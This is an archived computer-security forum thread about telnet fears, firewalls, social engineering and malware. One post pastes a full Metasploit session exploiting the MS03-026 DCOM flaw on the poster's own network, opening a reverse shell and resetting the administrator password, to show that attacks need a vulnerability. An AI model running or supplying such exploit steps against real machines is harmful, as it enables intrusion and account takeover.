Securing your computer

Status
Not open for further replies.
intresting thread and ill definatley take some advise from you lot . I from time to time read up on the hole hacking thing something that spooked me was someone told me if a hacker has your ip number they can hack your computer using the Telnet system if they also have a port number to get in with i dont know myself what do you think ? if this is the case how do you defend against it
That's if you've got a service running on that port which allows them to get in. If you have a firewall or a hardware router, you don't have to worry about that.
 
intresting thread and ill definatley take some advise from you lot . I from time to time read up on the hole hacking thing something that spooked me was someone told me if a hacker has your ip number they can hack your computer using the Telnet system if they also have a port number to get in with i dont know myself what do you think ?


You would need to have a service running on the remote machine to connect your client too. Also, to actually breach security over the net you need a vulnerabilty to exploit on the remote system. If not, well, this theory will not work. ;) start, run, telnet x.x.x.x 21 (21 can be any port number) also you would be doing a banner grab this which would tell you what service your currently connected too (if configured that way, that is)

Also, telnet alone is not enough. You would need nmap,netcat,metasploit,

BTW, heres a snipplet of me breaching a box on my WLAN.


[*] Starting the Metasploit Framework...



__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf msrpc_dcom_ms03_026(win32_reverse) > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.1.100
LHOST -> 192.168.1.100
msf msrpc_dcom_ms03_026(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 192.168.1.100:4321 <-> 192.168.1.101:3054

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net users administrator *
Type a password for the user:
Retype the password to confirm:
The command completed successfully.

C:\WINDOWS\system32>Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse) >

See what I mean by needing a vulnerability to exploit? If there was no vulnerability on the remote system I wouldnt be able to exploit (breach) the box (through this method that is) and no my box is no longer vulnerable to this. It's been patched since then. ;)
Cheers,
0x0161
 
wow that sucks about torrentspy.
time to install peer guardian and be more careful i think :)
 
Did you actually read the article?? I seriously doubt TorrentSpy would give up info. It would lose basically all it's users. No one wants to go to a site where they could get busted.

The article said they would just not allow access to U.S. users. That's easy to get around - just use a foreign proxy or something.
 
Still, there is one more thing that users often forget when it comes to computer security. The single biggest threat EVER to these things are not viruses, ~wares, Worms, phishing, rootkits or whatsoever threats that you people could imagine of. http://www.computerforums.org/images/smilies/confused.gif
Believe me or not, it is SOCIAL ENGINEERING, in which people could just ask you by saying, "My file(s)/folder(s) stuck in your computer.Can you give me your email/logon p/word so that I can retrieve back my files?"http://www.computerforums.org/images/smilies/eek.gif
Beware of these people. They could become a potential threat to your computer security. So next time if someone ask you to do so,
1) Please, I beg you, not to tell them your password or your computer will become highly insecure. If you need to, just tell ur closest friend(s) and warn them not to tell others without your permissions.....http://www.computerforums.org/images/smilies/rolleyes.gif
2) Or if you have just did so, do not forget/hesitate to change your old password. This may decrease the potential threats to your computer security
3) If you want to, you can hide the p/word that u've just type so that no one at your back , left, right can see the content of your password....Hope this is helpful....Cheershttp://www.computerforums.org/images/smilies/biggrin.gif
 
The biggest threat isnt the malware, its the end user. I repaired my friends laptop using Ubuntu, then installed XP and Vista on top of it (Ill explain). He likes going on 'certain' sites so Ubuntu for security there. XP for normal computing and Vista cos we needed the Meeting Space for a play we were lighting.

One Month later...

AVG uninstalled, replaced with a rogue antivirus software. Vista not loaded. Ubuntu shut off. XP bluescreening and reporting 5 different trojans.:(

Its done some damage to the hardware methinks as well cos Ive replaced the partition table, but I cant even install Open SuSe, Ubuntu or Debian on it now. *sigh*
 
Status
Not open for further replies.
Back
Top Bottom